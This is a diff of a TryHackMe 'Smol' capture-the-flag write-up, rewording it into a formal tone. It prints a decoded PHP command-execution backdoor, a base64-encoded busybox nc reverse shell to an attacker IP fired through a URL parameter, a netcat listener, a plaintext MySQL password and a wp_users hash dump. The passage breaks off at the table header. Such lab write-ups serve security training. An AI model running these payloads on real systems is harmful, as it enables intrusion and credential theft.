mrblue223/TryHackMe/Smol/Write_up.md

 CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=

-A quick decode revealed a simple but powerful PHP backdoor:
+Decoding this string revealed a simple PHP backdoor:

 if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }

-Which, after sorting out the funky escape sequences, translates to:
+Which, after resolving the octal and hexadecimal escape sequences, translates to:

 if (isset($_GET["cmd"])) { system($_GET["cmd"]); }

-This was fantastic!
-It meant I could execute pretty much any command I wanted on the server just by adding ?cmd= to the URL.
+This backdoor allows for arbitrary command execution on the server by passing commands via the cmd GET parameter.
-3. Opening the Door: Gaining a Reverse Shell
+3. Gaining a Reverse Shell

-Now that I had command execution, my goal was to get a proper, interactive reverse shell.
-This makes life so much easier for further enumeration and privilege escalation.
+With the command execution vulnerability confirmed, the next objective was to establish a persistent and interactive reverse shell on the target system.
-Crafting and Executing the Reverse Shell Payload - Sending the Signal
+Crafting and Executing the Reverse Shell Payload

-I decided to use a busybox nc payload for my reverse shell.
-To make sure it played nice with the URL, I base64 encoded it.
+A busybox nc reverse shell payload was constructed.
+To ensure proper execution through the URL, the payload was base64 encoded.

-My Reverse Shell Payload (Encoded for the URL):
+Reverse Shell Payload (Encoded for URL):

 echo "busybox nc 10.6.48.108 4445 -e sh" | base64
 # Output: YnVzeWJveCBuYyAxMC42LjQ4LjEwOCA0NDQ1IC1lIHNo

-Then, I just slapped that encoded payload into the cmd parameter in the URL:
+The encoded payload was then executed via the cmd parameter in the URL:

 http://www.smol.thm/wp-admin/index.php?cmd=echo YnVzeWJveCBuYyAxMC42LjQ4LjEwOCA0NDQ1IC1lIHNo | base64 -d | bash

-Setting up the Netcat Listener - Waiting for the Call
+Setting up the Netcat Listener

-Before hitting that URL, I set up my Netcat listener on my attacking machine (10.6.48.108) on port 4445.
-It was ready to catch the incoming connection.
+Prior to executing the payload, a Netcat listener was set up on the attacking machine (10.6.48.108) on port 4445 to receive the incoming connection.

 nc -lvnp 4445

-As soon as I triggered the URL, my listener sprang to life:
+Upon executing the URL, the Netcat listener successfully caught the shell:

 listening on [any] 4445 ...
 connect to [10.6.48.108] from (UNKNOWN) [10.10.109.27] 38294

-Boom!
-I had a shell, albeit a somewhat limited one, as the www-data user.
+This provided a limited shell as the www-data user.
-Spawning a Better Shell - Making it Interactive
+Spawning a Better Shell

-To make the shell much more comfortable and interactive, I immediately spawned a Python PTY:
+To gain a fully interactive shell, a Python PTY was spawned from the existing shell:

 python3 -c 'import pty; pty.spawn("/bin/bash")'

-Now I had a fully functional shell, ready for the next phase.
+This established a fully functional shell, ready for further enumeration and privilege escalation.
-4. Level Up!
-Privilege Escalation to diego
+4. Privilege Escalation to diego

-My next mission: elevate my privileges from www-data to something more substantial.
+The next phase involved escalating privileges from the www-data user to a higher-privileged account.
-MySQL Database Access - Checking the Vault
+MySQL Database Access

-Remember those wpuser credentials from wp-config.php?
-They were my ticket into the MySQL database.
+The wpuser credentials obtained from wp-config.php were used to access the MySQL database.

 mysql -u wpuser -p
 # Enter password: kbLSF2Vop#lw3rjDZ629*Z%G

-Dumping wp_users Table - User Hunting
+Dumping wp_users Table

-Once in MySQL, I honed in on the wordpress database and, more specifically, the wp_users table.
-This is where all the juicy user hashes are stored!
+Inside the MySQL prompt, the wordpress database was selected, and the wp_users table was queried to extract user hashes.

 show databases;
 use wordpress;
 select * from wp_users;

-The query gave me a list of users and their password hashes:
+The query returned the following user information and their password hashes:

 +----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
 | ID | user_login | user_pass                          | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |